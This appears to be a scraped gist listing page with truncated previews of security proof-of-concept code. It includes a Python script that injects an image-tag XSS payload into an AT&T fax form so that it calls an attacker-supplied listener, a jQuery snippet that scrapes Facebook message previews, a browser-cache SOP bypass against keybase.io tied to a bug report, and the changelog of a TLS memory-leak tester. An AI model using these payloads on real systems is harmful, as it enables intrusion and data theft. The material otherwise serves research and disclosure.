This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| url = "https://onlinefaxtwo.att.com/loa.php" | |
| listener = input('Listener address. default port [80]: ') | |
| headers = {'Content-type': 'application/x-www-form-urlencoded'} | |
| data = {'uCompanyName': '<img src="http://' + listener + '">', | |
| 'uPersonAuth':'asas', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script> | |
| <script type="text/javascript"> | |
| // http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9 | |
| $(function(){ | |
| parse_messages = function() | |
| { | |
| $('.twoLines.preview>.snippet').each(function(index,value) | |
| { | |
| lines = value.innerHTML.replace(/(<([^>]+)>)/ig,''); |
streghstreek
/ forcecache.html
Created
April 19, 2021 16:13
SOP bypass using browser cache (https://hackerone.com/reports/761726)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script> | |
| var url = "https://keybase.io/_/api/1.0/user/lookup.json?username={YOUR_USERNAME}"; | |
| fetch(url, { | |
| method: 'GET', | |
| cache: 'force-cache' | |
| }); | |
| </script> | |
| </html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Version 1.16 | |
| # | |
| # -changed output to display text only instead of hexdump and made it easier to read | |
| # -added option to specify number of times to connect to server (to get more data) | |
| # -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... | |
| # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) | |
| # -added option to have verbose output | |
| # -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command | |
| # -added option for hex output | |
| # -added option to output raw data to a file |